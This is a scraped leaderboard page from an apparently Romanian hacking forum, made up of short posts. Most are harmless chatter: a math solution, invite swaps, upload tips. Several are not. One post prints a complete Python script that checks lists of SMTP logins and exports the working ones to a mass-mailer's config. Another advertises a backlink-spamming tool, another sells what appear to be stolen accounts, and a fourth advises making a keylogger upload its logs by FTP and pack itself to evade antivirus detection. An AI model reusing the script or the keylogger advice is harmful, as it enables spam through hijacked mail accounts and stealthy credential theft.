Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 03/08/11 in all areas

  1. This little tool will loop trough 1.000's of links (115k+ to be exact), adding a backlink to your domain in most cases. This makes it a very handy SEO tool. Just click a button, sit back and relax . It should go without saying that this will take a long time to complete so it's one of those things you'll want to run over night or something. Download: http://ifile.it/xgra6iv/AdminSpotBacklinkBooster.zip Credits: Me DeLeTeD jayfella
    1 point
  2. Am un script facut pentru verificarea SMTP-urilor. Dar nu l-am mai folosit de ceva timp si nu stiu daca mai merge. Am nevoie de 2-3 SMTP-uri pentru TEST. The code look's like this : #!usr/bin/python #darkSMTPv.py #SMTP Checker - using Authentication #Coded by P47r1ck & low1z #----------------------------------- #... To be continued ... # # #THE CODE WILL TAKE A LIST OF SMTP ACCOUNTS IN THE FOLLOWING FORMAT (IP:USER:PASS) WILL TRY TO LOGIN AND THEN SEND #EMAIL TO THE ADDRESS THAT YOU CAN CHANGE ANYTIME IN THE CODE ( look below the #Create the message at the toaddr= # #EVERY WORKING SMTP ACCOUNT WILL PRINTED ON THE SCREEN WITH THE FOLLOWING MESSAGE : [!] Email Sent Successfully: IP USER PASS # #THE CODE HAS THE FOLLOWING FEATURES. # # 1. IT WILL SAVE THE LIST OF WORKING SMTP ACCOUNTS TO FILE OUTPUT THAT YOU WILL CHOOSE. # 2. YOU CAN ALSO SPECIFY THE EMAIL WHERE THE SMTP CAN SEND THE TEST EMAIL. # 3. IT WILL MAKE A LIST OF SERVERS FOR THE AMS (ADVANCED MASS SENDER PROGRAM), SO YOU CAN INSERT MORE EASIER THE SMTP #LIST INTO THE AMS.INI FILE FROM THE AMS PROGRAM. (LIST IS SAVED TO AMSlist.txt) # # # MORE FEATURES ARE COMING SOON!!! import sys, smtplib, socket, time, random from smtplib import SMTP from random import choice socket.setdefaulttimeout(5) # smtp default timeout, change number to speed up large lists def printHelp(): print '\nHow to use it ? There you go -- > ./darkSMTPv.py <accounts> <outputfile>' print '\nImportant: THE SMTP ACCOUNTS MUST BE IN THE FOLLOWING FORMAT : IP:USER:PASS\n' # Create the message fromaddr = "thewonder@wtfbbq.net" toaddr = "someone@yahoo.com" def rndstr(): rndstr = '' for x in range(0,6): rndstr += str(random.choice(range(0,5))) return rndstr rs = rndstr() message = """To: %s From: %s Subject: %s test SMTP mail """ % (toaddr,fromaddr,str(rs)) print "\n _ _ _____ __ __ _______ _____ " print " | | | | / ____| \/ |__ __| __ \ " print " __| | __ _ _ __| | _| (___ | \ / | | | | |__) |_ __" print " / _` |/ _` | '__| |/ /\___ \| |\/| | | | | ___/\ \ / /" print "| (_| | (_| | | | < ____) | | | | | | | | \ V / " print " \__,_|\__,_|_| |_|\_\_____/|_| |_| |_| |_| \_/ \n" print "\n This is not stopping here! ... To be continued." print "More features will be added soon. For bugs p47r1ckro[at]gmail[dot]com\n" print "_______________________________________________________________________" def timer(): now = time.localtime(time.time()) return time.asctime(now) def sendchk(listindex, host, user, password, info): # seperated function for checking try: smtp = smtplib.SMTP(host) smtp.login(user, password) code = smtp.ehlo()[0] if not (200 <= code <= 299): raise SMTPHeloError(code, resp) smtp.sendmail(fromaddr, toaddr, message) print "\n\t[!] Sending successful:",host, user, password print "\t[!] Message Sent Successfully\n" if info != '': LSstring = host+":"+user+":"+password+":"+info+"\n" else: LSstring = host+":"+user+":"+password+"\n" nList.append(LSstring) # special list for AMS file ID's LFile = open(output, "a") LFile.write(LSstring) # save working host/usr/pass to file LFile.close() AMSout = open("AMSlist.txt", "a") AMSout.write("[Server"+str(nList.index(LSstring))+"]\nName="+str(host)+"\nPort=25\nUserID=User\nBccSize=50\nUserName="+str(user)+"\nPassword="+str(password)+"\nAuthType=0\n\n") smtp.quit() except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException), msg: print "[-] Login Failed:", host, user, password pass if len(sys.argv) != 3: printHelp() exit(1) # Do not change anything below. accounts = sys.argv[1] output = sys.argv[2] try: handle = list(open(accounts)) except: print"\n[+] We were unable to open the SMTP filelist. Check again your path and try again." print"\n[+] Exiting...." nList = [] for line in handle: host = line.split(':')[0] user = line.split(':')[1].replace('\n', '') if line.count(':') == 2: try: password = line.split(':')[2].replace('\n', '') sendchk(handle.index(line), host, user, password, info='') except: print '\n[+] We have found a error in your accounts list' print host, user exit(1) elif line.count(':') == 3: try: password = line.split(':')[2] info = line.split(':')[3].replace('\n', '') sendchk(handle.index(line), host, user, password, info) except: print '\n[+] We have found a error in your accounts list' print host, user exit(1) else: print '\n[!] IMPORTANT: THE SMTP ACCOUNTS MUST BE IN THE FOLLOWING FORMAT : IP,USER,PASS' print '\n[-] Exiting....\n' print "[!] Ended at: " + timer() + "\n" print "\n[!] You should visit forum.darkc0de.com from time to time"
    1 point
  3. Am cateva, daca e vreunu care vrea, PM S-o prins tiganu si o schimbat tot, inainte sa apuc eu sa fac ceva...imi cer scuze... Na ca l-am futut inapoi am pus mana iar pe cont, deci care vrea invitatii, PM
    1 point
  4. Vand conturi orange......Cineva interesat ??? 30 euro/cont nenegociabil ca nu suntem la piata .. plata prin paypal
    1 point
  5. S_n=5n^2 +6n ------------ S_(n+1)-S_n=a_(n+1) => 5(n+1)^2 +6(n+1)-5n^2 -6n = a_(n+1) => 5(2n+1)+6 = a_(n+1) => a_(n+1) = 10n+11 a_(n+1) = a_1 + nr => a_1 = 10n+11-nr S_n = (2*a_1 +(n-1)r)*n/2 = 5n^2 +6n => 2a_1 +(n-1)r = (10n^2 +12n)/n => 2a_1 + (n-1)r =10n +12 20n+22-2nr+(n-1)r=10n+12 => 10n+10=r(2n-n+1) => 10(n+1)=r(n+1) => r=10 a_1=10*1+11-1*10=11 a_1=11 & r=10 Mi-e somn...
    1 point
  6. http://zerne.files.wordpress.com/2008/10/764_capitalism_pyramid.jpg . N-am suportat ideea socialismului niciodata. Capitalismu insa e sclavie curata.
    1 point
  7. osyk ia-ti premium sa poti face si remote upload iar cu banii stransi dai la trade points si iti prelungesti contul de premium mult mai ieftin.eu pe 3 luni am dat 14 $ in loc de 25
    1 point
  8. pai si asa care mai e diferenta intre aia cu adevarat buni si aia codati...probabil doar constiinta...
    1 point
  9. @Cheater@lafurat Poti sa ai cea mai mare viteza posibila, tot vei atinge o limitare. Ori placa de retea, ori vreun router, dar cel mai posibil, propriul mediu de stocare. Niciun HDD/SSD nu poate scrie cu 280 MB/s, deci degeaba ai viteza atata.
    1 point
  10. Codul sursa extras aici: Your code. Your site. Use it. - paste.org Felicitari coderului! Note coderului: Scoate icoana de tray Poti baga sa uploadeze pe ftp cu ajutorul un batch extern pus la un interval anume de timp sa ruleze din keylogger! (dak te intereseaza pm me) Ca sa fie iar nedetectabil compilatil intr-un packer mai bunicel, exclus themida ca e vazut ca virus..(preferabil pe compact)
    1 point
  11. Am nevoie de o invitatie pe hi2 dau la schimb una pe scenefz... Dau invitatii si moka la primi 5 useri
    -1 points
×
×
  • Create New...